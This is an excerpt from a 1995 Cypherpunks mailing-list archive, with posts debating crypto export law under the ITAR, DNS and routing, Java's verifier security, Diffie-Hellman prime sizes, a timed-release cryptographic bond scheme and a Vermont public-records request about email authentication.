seemed to make that much sense, except that the lack of ubiquitous
encryption probably allowed for lots of  realatively non-sensitive 
intercepts that might otherwise have been impossible, and which may have 
been useful fuel for analysts. 

 However, now that the cold war is over, and now that fab plants are
sprouting up all over the world, these restrictions make a lot less sense
than they used to. Their main consequence is to restrict the deployment of
strong cryptography world wide, including the United States. Strangely
enough this would seem to hurt, not help, the NSA in the most important
part of their current mission, which is to help protect US industry
against industrial espionage and virtual terrorism, which is a far more
pressing threat. 

It's time for the policy makers at the NSA and GCHQ to realise that they
won the war, give the appropriate people OBEs and knighthoods, allow the
GCHQ to rejoin the civil service unions and apologise for the insult to
their patriotism of their forcible de-unionisation, and above all,
concentrate on fighting the real enemy - The French :-)

Simon // Wow! Did I really just write all that. Next thing you know, all 
      // be saying sometime nice about Netscape.

p.s.
 
   I would expect the incoming Labour government to remove the ban on
Union membership at GCHQ, with the old guaranteed non-strike agreement. I
wonder how many other similar organisations allow employees to belong to
unions? I'd guess that the Israeli ones would, mainly because I can't
imagine any major Israeli organisation not being unionised :-); I can't
picture the CIA or NSA allowing collective bargaining ("America works 
best when you say Union 0w98bvchgfwer097").






From rsalz at osf.org  Mon Nov  6 23:11:29 1995
From: rsalz at osf.org (Rich Salz)
Date: Tue, 7 Nov 1995 15:11:29 +0800
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
Message-ID: <9511070647.AA00471@sulphur.osf.org>


>Originally DNS was just a handy user-friendly thing, but then
>it because the primary way to name a host.  This allowed the IP address
>to become irrelevant, which allows entire sites to be renumbered when the
>network topology changes.  This is important to keep the routing tables
>small (by minimizing the backwards-compatibility exceptions), which is
>a critical problem today.  Thus all recent architectural decisions have
>been away from direct use of IP addresses anywhere.

Hunh?

The Arpanet always used hostnames.  Just about the only time you
needed to specify a raw network address was when you were dialed into
a TAC and you did things like "@o 137" to connect to mit-mc.

DNS was created because the hosts.txt file, a single network-wide
file that listed the name, address, aliases, system type, etc., of
every host in the Arpanet got to be unmaintainable.

Routing is totally unrelated to DNS, based as it is in IP addresses.
Routers know nothing about DNS.
	/r$





From rsalz at osf.org  Mon Nov  6 23:33:17 1995
From: rsalz at osf.org (Rich Salz)
Date: Tue, 7 Nov 1995 15:33:17 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <9511070710.AA00528@sulphur.osf.org>


> Strangely
>enough this would seem to hurt, not help, the NSA in the most important
>part of their current mission, which is to help protect US industry
>against industrial espionage and virtual terrorism, which is a far more
>pressing threat. 

Matt's NATO adventures, for example, are an interesting example of what
happens when the two missions -- "protect our secrets" and "read theirs"
-- come into conflict.  (Not unlike the US Dept of Agriculture.)  Their
open involvement in places like W3C, where Agency staff talk about getting
Fortezza cards in COTS products provide another datapoint.

Budgets cuts may turn out to be strong crypto's best friend.
	/r$





From anonymous-remailer at shell.portal.com  Mon Nov  6 23:49:53 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 7 Nov 1995 15:49:53 +0800
Subject: Java insecurity - long - argumentative - you are warned.
Message-ID: <199511070722.XAA05390@jobe.shell.portal.com>


On Mon, 6 Nov 1995, Dr. Frederick B. Cohen wrote:

> WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS
> A FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED!

> > 4.2 Security in the Java Environment
> > 
> > Security commands a high premium in the growing use of the Internet
> > for products and services ranging from electronic distribution of
> > software and multimedia content, to "digital cash". The area of
> > security with which we're concerned here is how the Java compiler and
> > run-time system restrict application programmers from creating
> > subversive code.

[long list of important questions deleted ...]

Essentially, I think that all of this will distill to a single issue,
vis-a-vis Java or any other paradigm which wishes to represent itself as
*secure*.

Where is the security review role placed within the project development
life cycle?? 

Is it at Design Concept?  Or during Application Development?  Or is it
done last, after design completion, after all of the programming is
complete and the production people are involved in operational turnover. 

Or is it done at all?

This concept is not new, and should not present any problems to anyone in
the industry.  Even John Q. Public will understand it, if we use a simple
construction analogy. 

If you want to build a secure house, your security doesn't start AFTER the
house is built.  It has to start at a very early stage.  It starts before
the blueprints are made, when you specify that you want a concrete
windowless box located on a quiet street at the end of a cul-de-sac.  

That is simple and obvious. 

You certainly don't have *security* if after building a glass house on
Main Street, if after the design is finished, the footings have been
poured, and the key is about to be turned over to the occupant; if then,
as an afterthought you put a single strong deadbolt on the front door to
"secure" it. 

Anyone who can't or won't quite grasp this idea is either willfully
attempting to steer gullible individuals astray, or is congenitally
stupid. 

It's time to call a spade a spade. 

> What exactly does this mean?
> 
> > While all this checking appears excruciatingly detailed, by the time
> > the byte code verifier has done its work, the Java interpreter can
> > proceed knowing that the code will run securely. Knowing these
> > properties makes the Java interpreter much faster, because it doesn't
> > have to check anything. 

Yikes!!  I'll leave this for someone else to address.  This sounds to me
like a variation on virus scanning.  I think that there are far more
reputable virus experts than I who can comment and expand on *flaws* with 
that approach. 

> No runtime checking whatsoever.  Get past the supposed verifier, and you
> have free run of the machine.  A single verifier bug or inadequacy, and
> the world is unsafe for electronic commerce. 

As someone who *vividly* remembers October, 1987 and the near economic
meltdown which was BARELY averted by the Fed, a near meltdown which
occurred because of the interactions of systems far less intelligent or
complex than those we routinely utilize today, systems which directly
interface not only to each other, but have undocumented, non-predictable
interactions with "soft and wet" systems, I might have some serious
concerns. 

Then again, it is _only_ the economy, isn't it? 

> ASBESTOS SUITS MAY NOW BE REMOVED - FLAME OFF.
> 
> P.S.
> 
> When: Tuesday, November 7, 8AM
> Where: The Hilton, Washington D.C. (the CSI conference)
> The talk: 50 Ways to Attack Your World Wide Web Systems
> 
> If you want a chance to heckle - be there.

Drat ... I don't think that I'll be able to attend.  I've already got
a local presentation that I've pencilled in for tomorrow morning at
some god awfully early hour.  Then again, D.C. isn't quite my circuit.

I was hoping though for some clarification.  Are you THE Dr. Frederick
B. Cohen??  The one who originally coined the phrase "computer virus"
and who maintains the computer virus FAQ?

Are you THAT Dr. Frederick B. Cohen, and are you speaking publically
in Washington, tommorow as one of the keynote speakers?

If you are, I'd be interested as to whether you'll talk about the
recent gaping security hole in the existing installed Navigator code
base which I detailed to this list's subscribers. 

The one posted this last Friday the Thirteenth, that questioned
Netscape's wisdom in creating an experimental MIME object which does
not follow the usual HTTP request/response paradigm, but instead
allows a server to open and maintain a bi-directional communications
channel from server to client.

Effectively a non-password protected telnet into the heart of any
system, a open exploitable connection which penetrates proxy servers
and firewalls, and acts as an enhanced bi-directional
delivery/recovery mechanism?

I'd be very interested in the comments around that, especially since both
Netscape and AT&T (who distributes the softwre under its own brand name) 
have made an explicit "no comment".

I'd especially be interested in any post-session transcript. 

I also think that Elaine Garzarelli might be interested.  Especially since
she'll be addressing the nation and the public via the public television
airwaves this Friday evening. 

Or at least ... uhmmm ... I _think_ that's when her electronic daytimer
has her pencilled in ...




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From stewarts at ix.netcom.com  Tue Nov  7 16:50:14 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Tue, 7 Nov 95 16:50:14 PST
Subject: forging headers (with more header information)
Message-ID: <199511080049.QAA23866@ix4.ix.netcom.com>


>Without having any access to anything but the headers, it looks like
>you are an employee for SGI and sent the message from there.
>
>Look at the last Received: header.  It went from sgi.com to mit.edu to
>well.com and then to you.

Obviously was forwarded from a remailer inside SGI ....

#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---






From goedel at tezcat.com  Tue Nov  7 01:13:04 1995
From: goedel at tezcat.com (Dietrich J. Kappe)
Date: Tue, 7 Nov 1995 17:13:04 +0800
Subject: Java insecurity - long - argumentative - you are warned.
Message-ID: <v01510103acc4ce7ca31a@[206.1.161.4]>


-----BEGIN PGP SIGNED MESSAGE-----

>> > While all this checking appears excruciatingly detailed, by the time
>> > the byte code verifier has done its work, the Java interpreter can
>> > proceed knowing that the code will run securely. Knowing these
>> > properties makes the Java interpreter much faster, because it doesn't
>> > have to check anything.
>
>Yikes!!  I'll leave this for someone else to address.  This sounds to me
>like a variation on virus scanning.  I think that there are far more
>reputable virus experts than I who can comment and expand on *flaws* with
>that approach.

This "checking," as any comp-sci undergrad will tell you, amounts to solving
the halting problem for the java interpreter. While this is possible for a
finite state automata like the java interpreter (made more difficult by the
fact that it can use the "net" for additional state), it is not even
remotely feasable.

If you can write a checker that works in a reasonable amount of time, I'll
write a turing machine simulator that'll do something nasty if the input
machine halts. Then we'll split the fame and fortune for solving the 5 state
Busy Beaver problem. Deal?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMJ8gtXIf3YegbdiBAQGqMQJXWzwuPYM2bNb96Fgfb1wGeDC83fNFOW5H
8PQHbnt8bDFsHxKv2L8kcBhtO/TWA0cugVYR9YFf2BOaGoA2UIoCBdwfABM1HAKU
hd0H
=TA2E
-----END PGP SIGNATURE-----

Dietrich Kappe | Red Planet    http://www.redweb.com
Red Planet, LLC| "Chess Space" | "MS Access Products" |  PGP Public Key
1-800-RED 0 WEB|    /chess     |       /cobre         | /goedel/key.txt
Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84







From shields at tembel.org  Tue Nov  7 01:26:29 1995
From: shields at tembel.org (Michael Shields)
Date: Tue, 7 Nov 1995 17:26:29 +0800
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <9511070647.AA00471@sulphur.osf.org>
Message-ID: <47n7m0$i3k@yage.tembel.org>


In article <9511070647.AA00471 at sulphur.osf.org>,
Rich Salz <rsalz at osf.org> wrote:
> >Originally DNS was just a handy user-friendly thing, but then
[...]
> Hunh?
> 
> The Arpanet always used hostnames.

Sorry.  But still, then intent was to be user-friendly (right?), and
a side effect was to make it possible to renumber without anyone noticing.

Renumbering didn't affect the health of the net until recently, with
CIDR, where blocks of IP addresses could be aggregated arbitrarily.
A provider might now get 10.11.12/22 (i.e., a 22-bit-long prefix), and
then assign customers 10.11.12/24, 10.11.13/23, &c., with only one entry
in the backbone routing tables.  To make this work you have to renumber
when you change providers.  Fortunately, we have DNS to provide a name
more stable than the IP address.

That's the connection between DNS and routing, and it's why using names
instead of numbers is Good.
-- 
Shields.





From ho at cs.arizona.edu  Tue Nov  7 18:14:26 1995
From: ho at cs.arizona.edu (Hilarie Orman)
Date: Tue, 7 Nov 95 18:14:26 PST
Subject: Photuris Primality verification needed
In-Reply-To: <199511080146.RAA22568@servo.qualcomm.com>
Message-ID: <9511080214.AA12812@uncial.CS.Arizona.EDU>


>  Well, since we already require 56-bit DES in ESP in the interests of
>  promoting basic interoperability, wouldn't a 512-bit prime be
>  similarly sufficient?

If you are willing to accept that in all likelihood, one year from
now, some group will announce that can "crack" all key exchanges that
using the published modulus, then sure, call it sufficient.  There is
certainly precedent; it was my understanding that Sun did not change
their SecureRPC modulus when informed of LaMacchia and Odlyzko's work.





From whitaker at sover.net  Tue Nov  7 18:21:28 1995
From: whitaker at sover.net (Stephen Whitaker)
Date: Tue, 7 Nov 95 18:21:28 PST
Subject: Electronic-reply issues
Message-ID: <199511080220.VAA14821@maple.sover.net>


[Key Words: public records; privacy; encryption; archives;
Telecommunications Plan;]

November 7, 1995

Mr. Geoffrey Commons Esq.
Special Counsel
Vermont Department of Public Service
State Street
Montpelier, Vermont 05602

Dear Mr. Commons:

Thank you for your prompt reply to my document request.

Yes, I will accept your electronic correspondence as your 'written' reply.

However, this brings up several good points which I would ask that you
follow up on:
The receipt of an e-mail message does not, in and of itself, assure the
recipient of the messages' authenticity, privacy or preservation. 

On the authentication issue, it is well known that the message headers are
absolutely insufficient to authenticate the sender of a message. Digital
technologies, using encryption, are required here. Other issues are the
privacy of the message along it's long path between your desk and my office,
and the records later availability,  _in electronic format_, if requested. 

Regardless of the fact that we work only a thousand feet apart here in
Montpelier, this message has probably traversed, _in clear text_, through
Hartford CT., Albany NY., or Boston MA. prior to being exchanged between the
so called 'gov-net' and sover.net. Your reply has also probably been backed
up to a tape at the DPS, combined with other exempt public records dealing
with current regulatory litigation or consumer complaints. These storage
procedures, or lack thereof, could serve to impede future access to these
and other records by the public.

The original voice mail request and it's written reply take on some form of
public records status where, by statute, records must be cataloged so as to
be locatable if requested, and archived for a certain period of time
pursuant to an approved records retention schedule. Those schedules are
approved by the director of public records, John Yacavoni.

It occurs to me that the DPS is required under the Vermont statutes
governing the preparation of a Ten Year Telecommunications Plan, to analyze
telecommunications  technologies and the implication of their use in both
the public and private arenas. The pertinent parts of the statute are
included here for your convenience.

*******************begin_included_document****************************
30 VSA 202d
                       *        *       *
        >(b)  The department, through the director, shall prepare a
telecommunications plan for the state.  The plan shall be for a 10 year
period and shall serve as a basis for state telecommunications policy.  The
plan shall include at a minimum:
>		(1)  an overview, looking ten years ahead, of statewide growth and
development as they relate to future requirements for telecommunications
services, including patterns of urban expansion, statewide and service area
economic growth, shifts in transportation modes, economic development,
technological advances and other trends and factors which, as determined by
the director, will significantly affect state telecommunications policy and
programs;
>		(2)  a survey of Vermont residents and businesses, conducted in
cooperation with the agency of development and community affairs, to
determine what telecommunications services are needed now and in the
succeeding ten years;
>		(3)  a study and evaluation of conversion to measured service as ordered
by the board;
>		(4)  an assessment of the current state telecommunications system and
evaluation of alternative proposals for upgrading the system to provide the
best available and affordable technology for use by government.
>	(c)  In developing the plan, the department shall take into account the
policies and goals of section 202c of this title, and the need for basic
service at affordable rates, improved competition among providers, the needs
of the state as user of telecommunications services, and future development
of the state.

*******************end_included_document***************************

It would then logically follow that a thorough analysis of these issues,
which are not created by, but are certainly complicated by
telecommunications technologies, should be included in the forthcoming Draft
of that plan. The department would then offer the citizens and the business
community an opportunity to recommend changes or elaboration on those draft
recommendations. These should include, but are not limited to the use of
digital signatures, authentication and encryption technologies, and last but
not least EDI or Electronic Document Interchange.

These technologies are relevant to the state as a whole as far as
positioning our citizens and businesses to participate in the rapidly
emerging era of electronic commerce (where absolute privacy protections are
essential), but are also immediately relevant to the gov-net/ school-net
implementation, and even to the workings of your Department of Public
Service and the quasi-judicial Public Service Board in order to enable
electronic filings, to expedite the backlog of dockets and to answer
official document requests.

As far as I know there is no other working group addressing these issues at
present. Possibly your 'written' reply to my public records request,
delivered via e-mail, will serve to catalyze such an effort in the context
of a PSB-DPS working group (open to the public, of course) or in one of the
amazingly effective forums in which your commissioner participates dealing
with telecommunications.

One more question: was the voice mail message which I delivered to you,
which certainly constitutes a record "created or acquired in the course of
agency business", retained, cataloged and archived? Or, if it was destroyed,
was it pursuant to an approved records retention schedule? I recall the
voice mail message to your Commissioner relating the Clyde River Dam
negotiations which prompted a headline story and wish to emphasize the
relevance of these new technologies and the management of public records.

I look forward to your thoughtful reply, or that of your Commissioner,
Richard Sedano.
Now aren't you glad you use e-mail?

Sincerely,

Stephen Whitaker
Design Access Network
P.O.Box 1331
Montpelier, Vermont 05601-1331

whitaker at sover.net



At 06:22 PM 11/7/95 EDT, you wrote:
>November 7, 1995
>
>Dear Mr. Whitaker:
>
>     I have today received your request (left on my voice mail 
>yesterday, 11/6) to inspect certain documents.  I understand your 
>request to be for access to all staff analyses and internal or 
>external correspondence regarding 9-1-1 costing or implementation, 
>prepared or received by the Department of Public Service during 
>calendar year 1995.  Please let me know if I have misunderstood your 
>message.
>
>     I have relayed your request to all DPS staff, and we are in the 
>process of collecting and reviewing responsive documents.  Due to the 
>length of time covered by your request, as well as its breadth, it will be 
>a few days before I can be sure that I have collected and reviewed all 
>responsive documents.  Therefore, pursuant to 1 V.S.A. sec. 
>318(a)(5)(B), I am advising you that I expect to make the requested 
>documents available no later than Tuesday, November 14.  If I can 
>make them available earlier, or if unexpected delays are encountered, 
>I will let you know.  Otherwise, you may inspect the documents at the 
>DPS, 112 State Street, Montpelier on November 14 as provided by 
>statute.
>
>     Since you requested my reply by e-mail, I am assuming that this 
>message will suffice as "written notice" under the Access to Public 
>Records law.  Please let me know if you would prefer a response by 
>ordinary mail.
>
>     Thank you for your inquiry and continuing interest in these 
>matters.
>                                                           Sincerely,
>
>                                          Geoffrey Commons, Special Counsel
>

Stephen Whitaker	

///////////////////////////////////////////////////////////////////////

     _/_/_/              _/_/             _/      _/
    _/    _/           _/   _/           _/_/    _/
   _/     _/         _/_/_/_/           _/  _/  _/
  _/    _/          _/    _/           _/    _/_/
 _/_/_/   ESIGN    _/    _/ CCESS     _/      _/ ETWORK

///////////////////////////////////////////////////////////////////////

Design Access Network		   	 802.479.6118
Post Office Box 1331  			 whitaker at sover.net     		
Montpelier, Vermont     05601-1331	 PGP public key available






From shields at tembel.org  Tue Nov  7 02:42:27 1995
From: shields at tembel.org (Michael Shields)
Date: Tue, 7 Nov 1995 18:42:27 +0800
Subject: Timed-release crypto and information economics
In-Reply-To: <acc4182012021004674b@[205.199.118.202]>
Message-ID: <47ncgr$ji6@yage.tembel.org>


-----BEGIN PGP SIGNED MESSAGE-----

In article <acc4182012021004674b@[205.199.118.202]>,
Timothy C. May <tcmay at got.net> wrote:
> This seems to be saying the same thing. In both cases, "Alice" is either
> distributing a message to"Bob," "Charles," "Donna," etc., with instructions
> not to return the pieces until Date X, or is holding onto a sealed message
> but asking that the decryption keys not be returned until Date X. I don't
> see the real difference, modulo some minor factors. In neither case can the
> original message be reconstructed unless n out of m of the escrow agents
> provide the pieces.

Here are some attacks where my scheme is more resistant.  I'll suppose
that Alice is writing a bond, i.e., time-delayed cash, to Bob.


1. Alice does not really write a bond

In my plan, Alice gives Bob the message along with a certificate saying
that it is a bond.  If the message is actually not a bond, Bob can
demonstrate fraud upon the maturity date without revealing his identity,
by posting the now-readable message along with the contradictory signed
statement from Alice.

In your plan, Alice cannot provide the actual message to Bob, nor
prove that she even sent anything through the blind remailer network.
Bob would have to ask her to sign a certificate saying that she wrote
a bond to Bob for $n to mature on date X; she may not be willing to
admit that in a publicly demonstrable way.  And if she defrauded Bob,
he cannot prove he did not receive a bond.


2. The crypto houses lose keys/messages

In my plan, the crypto house's signature on the public key it issues
guarantees that the secret key will be available upon the maturity date.
If the house loses the secret key, then anyone can prove this, again
anonymously, by publishing the signed public key and asking anyone to
try to purchase the corresponding secret key.  The house cannot say it
is a false claim.  The unreliable house hemorrhages reputation, and Bob
still has his money as long as n houses were reliable.

In fact, even if Bob ca'n't trust n houses, he can still hedge.  He would
just buy a futures coupon saying that the house in question will lose
a key.  This is a classic use of hedging, and it allows him to recover
his money, anonymously.

In your plan, you just have to hope the remailers don't lose more than
m-n parts.  You rely on reputation-raters to judge reliability in a
probabilistic manner.  This works ok currently, with amateur remailers,
but not in a future world held to the 100% standards of financial
reliability.  (And those standards are very high.  Consider the public
reaction if you saw proof that a bank had "lost" someone's checking
account, one among a million.)


3. The crypto houses leak keys/messages

In my plan, this is ok.  You need both the keys *and the message*
to decrypt.  Only Bob holds the message.  (It's axiomatic that you can
keep a secret out of self-interest; your personal private key is such
a secret.)  In fact, at the maturity date, the secret keys will become
available to anyone, and Bob still won't be hurt.

Meanwhile, crackers have incentive to steal keys even without breaking
messages, because they can use them to make a profit on "Megahouse leaks
keys" futures, by posting the secret key matching a signed public key.
This can be anonymous, or they can use it to raise their nym's reputation
among crackers.  Because Megahouse knows it will be caught *every time*
it leaks, it must keep 100% financial-quality security.  This is an
excellent failure mode because all failures will be public.

In your plan, you just have to hope fewer than n pieces are made available
to the cracking ring.  And when you get a bond consisting of double-spent
bills, you ca'n't tell who broke security.  This is intractable for a
reputation-rater to determine to the necessary standards of accuracy.


4. Alice leaks the message

This is "fraud through negligence" and is treated as in case 1.  If Bob
thinks it's likely, he can hedge by buying a "Alice shown untrustworthy"
futures coupon.  (Those will be *so* useful.)


Because of the two-part design of a delayed message, it takes collusion
by those in possession of ciphertext *and* keys to unseal a message.
Before the maturity date, only Alice and Bob have the message, and only
the banks have the keys.  The message is of value only in that it will
be valuable in the future along with the then-available secret keys.
(Or, I suppose, possibly to prove fraud; that's of even more value.)
All collusion can be righted, everything is anonymous unless reputations
are involved, and all fraud is publicly exposed.

These are interesting properties.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJ81SeyjYMb1RsVfAQG5GQP/RP5IkcQUFo++aBWHUmoTGuIBphykQxp/
HR40yt4GzIJQUIpEbM7iiD6Dk9hDLoF4GY9MQrPnxmhfGu4uITxYeDMfsPHJLv01
xCu9//xYJ9Usb3eWJFSURhBkSQg05T4upZX2KTj5NlTB4dbMJumReDeUix236FaU
W2eRxdiw0Us=
=zCpp
-----END PGP SIGNATURE-----
-- 
Shields.





From junger at pdj2-ra.F-REMOTE.CWRU.Edu  Tue Nov  7 05:19:20 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Tue, 7 Nov 1995 21:19:20 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <Pine.SOL.3.91.951106202632.8543C-100000@chivalry>
Message-ID: <m0tCnq6-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>


Simon Spero writes:

: On Mon, 6 Nov 1995, Peter D. Junger wrote:
: 
: > 
: > Don't blame this on my being a lawyer; blame it on some very sick
: > people in the Office of Defense Trade Controls and in the NSA.
: 
: I think it's unfair to call the people at the ODTC and the NSA sick; 
: during the cold war, such restrictions did make some sense; in 
: particular, controlling the export of high-performance encryption 
: hardware does make it harder for other countries to deploy ubiquitous 
: strong encryption, particularly in the less developed countries, and 
: particulalry for chips that required exotic fabrication (the soviet union 
: never had really good mass-production facilities). 

The ones I was suggesting are sick are the ones who drafted the
definition of ``export'' and of ``technical data'' in the ITAR.  Would
you consider it more appropriate if I called them perverse?

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger at pdj2-ra.f-remote.cwru.edu    junger at samsara.law.cwru.edu





From junger at pdj2-ra.F-REMOTE.CWRU.Edu  Tue Nov  7 05:25:25 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Tue, 7 Nov 1995 21:25:25 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <199511070405.XAA14913@jekyll.piermont.com>
Message-ID: <m0tCngd-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>


"Perry E. Metzger" writes:

: "Peter D. Junger" writes:
: 
: > If a Frenchman on vacation in the Riviera shows a copy of PGP sourcecode
: > to a German businessman there, that is literally a violation of the
: > ITAR.
: 
: Where the hell did you get that idea?  

>From Section 120.17 of the ITAR which provides:

 _Export_ means:

 . . . .

 (4) Disclosing (including oral or visual disclosure) or transfering
 technical data to a foreign person, whether in the United States or
 abroad . . . .

(And technical data is (baroquely) defined in Section 120.10 as
including certain software, including crytographic software.)

: The ITAR clearly does not apply
: to foreigners disclosing things to each other outside the United
: States. 

Where the hell did you get that idea?  

: I've read it and I can't see how it could possibly be so
: interpreted. I'm not a lawyer, but this interpretation is so bizarre
: as to be almost untenable. I can clearly see that a U.S. person
: talking about DES to a foreign person can be a violation under the
: language in the regulations, but there is no way on earth to interpret
: the regulations as applying to foreigners abroad talking to other
: foreigners outside the U.S.

Go read the section that I quoted again.  Where is there an exception
for foreign persons who happen to be abroad?  

: > Don't expect the ITAR to make any sense.  And don't think that you can
: > apply logic to the ITAR and get logical results.  It doesn't work that
: > way.

: I was under the impression, though, that the words meant what they
: said.

When did you change your mind?

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger at pdj2-ra.f-remote.cwru.edu    junger at samsara.law.cwru.edu





From cme at clark.net  Tue Nov  7 06:12:37 1995
From: cme at clark.net (Carl Ellison)
Date: Tue, 7 Nov 1995 22:12:37 +0800
Subject: it could be worse
Message-ID: <199511070410.XAA29659@clark.net>




 ``According to the former head of Romania's secret police, Ion Mihai
Pacepa, there had been ten million microphones in a country of twenty-three
million people.  That would mean that nearly everyone had been listened to
and then blackmailed into listening and reporting on others.  A maze of
psychic tunnels led from one person to another.'' [Andrei Codrescu, "The
Hole In The Flag", pp. 21-22]






From droelke at spirit.aud.alcatel.com  Tue Nov  7 06:29:12 1995
From: droelke at spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Tue, 7 Nov 1995 22:29:12 +0800
Subject: toolkits?
Message-ID: <9511071418.AA25542@spirit.aud.alcatel.com>



Timothy C. May wrote:
>
> At 12:41 AM 11/7/95, Stephen Whitaker wrote:
> 
> >just might have a prayer of doing it right, whatever that is. What would it
> >look like if secure communications and anonomynity were designed in from the
> >start? Is this what Sameer is doing in Bezerkeley?
> >
> >What machines are considered minimum requirements to use these tools? What
> >are the essential reference works?
> 
> "Security and anonymity" are not matters for government to ensure.
> 
[...]
> I urge you, Stephen, to read up on encryption and the benefits contained
> therein. Looking to your state capital to secure your communications is a
> lose.
> 
 
Tim - I think your libertarian side is showing here....
Not that this is a bad thing, but I think there are some things 
that state governments can and/or should do.

First off - avoid trying to legislate minute details of any encryption
or signature scheme.  Bureaucrats trying to understand, much less control
technical things is doomed to fail.  (take GOSIP as a prime example)

Second - push for legal acceptance of digital signatures and
acceptance of privacy through encryption.  I believe Utah has taken a strong 
step in this direction.  Most people, businesses, and courts won't accept
digital contracts and the like until there is more of a sound
set of laws behind them.  Strong laws against government snooping or
against anti-encryption or anti-anonymous laws are a good thing IMO.
Besides - laws like that will let the bureaucrats drown themselves
in their own paperwork making sure then follow their own rules - and keep 
them out of our hair. ;-)

Third - provide services to the citizenry.  For example - provide
a public key server.  Or how about a digital time-stamping service.
If the crap was kept out of these services, and they were free for
anyone to use, then it would advance the idea of encouraging people to
use crypto in their daily lives.

Warning - Although I think there are some good things that governments
can do, it is also very important to watch out for "sabotage" by 
the government.  Governments tend to like control too much and by
trying to maintain control, reverse a useful service to one that
is a dis-service to the people.  In general, if governments get
out of the way, people will take care of problems themselves.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke at aud.alcatel.com                             Richardson, TX






From perry at piermont.com  Tue Nov  7 06:31:08 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 7 Nov 1995 22:31:08 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <9511070341.AA15892@zorch.w3.org>
Message-ID: <199511070400.XAA14905@jekyll.piermont.com>



hallam at w3.org writes:
> One of the many problems in Perry's approach is that an international treaty
> is in essence a contract between governments.

Were that the case, citizens couldn't sue to have provisions impacting
them enforced, but the fact of the matter is that they can.

> Perry's somewhat offensive language is not a substitute for an argument.

Thank you for the ad hominem.

> I think I would take Perry's disbelief that a person is a lawyer becuse
> he disagrees with him as reflecting more on Perry than anyone else.

I'm not entirely sure that the international telecoms treaties cover
this, but both the gentleman I was conversing with and I appeared to
have assumed for purposes of discussion that they did. Given that, the
notion that international telecoms treaties are superceeded by the
ITARs does indeed give one pause to wonder.


Perry





From carolann at censored.org  Tue Nov  7 06:32:16 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Tue, 7 Nov 1995 22:32:16 +0800
Subject: Request for URL'S
Message-ID: <199511062033.UAA17159@mailhost1.primenet.com>


I have trebled my WWW site size.
It is now a comfortable 15 megs big.

I'd love to make a Cypherpunk URL page,
so if you will send your five favorite URL's
I'll put them all on a page like The Dreams Page,
(http:www.primenet.com/~carolab/dreams.html)
and turn it loose on the net.

Nov. 15th is when I will edit up the page.

Love Always,

Carol Anne
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann at censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/






From tcmay at got.net  Tue Nov  7 06:36:20 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 7 Nov 1995 22:36:20 +0800
Subject: [NOISE] DejaNews all over again--a URL for Usenet Searching
Message-ID: <acc41c71130210046b0e@[205.199.118.202]>


At 5:49 PM 11/6/95, Peter Trei wrote:
>> I usually avoid passing on URLs of interesting sites, in the name of
>> conserving bandwidth (*), but this one really has me jazzed:
>> http://dejanews.com/
>> It allows searching of Usenet archives (a few months' worth, from what I
>> can see).
>
>Unfortunately, it does not archive alt, soc, talk,  or *.binaries (the
>latter is
>probably a blessing). Specialized news grepping is still useful - see
>http://www.iii.net/users/trei/usenet.html for an example.

excite Netsearch (http://www.excite.com/) indexes all or part of alt, soc,
and talk groups. (I say "all or part" because I obviously cannot verify
that it indexes all posts to these groups just by verifying that it indexes
at least _some_ posts in these groups.)

It even indexes the *.binaries.* groups, as I just learned.

(Paul Robichaux told me about the http://www.excite.com/ URL.)

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From adam at lighthouse.homeport.org  Tue Nov  7 06:38:58 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Tue, 7 Nov 1995 22:38:58 +0800
Subject: forging headers
In-Reply-To: <199511070249.SAA14921@well.com>
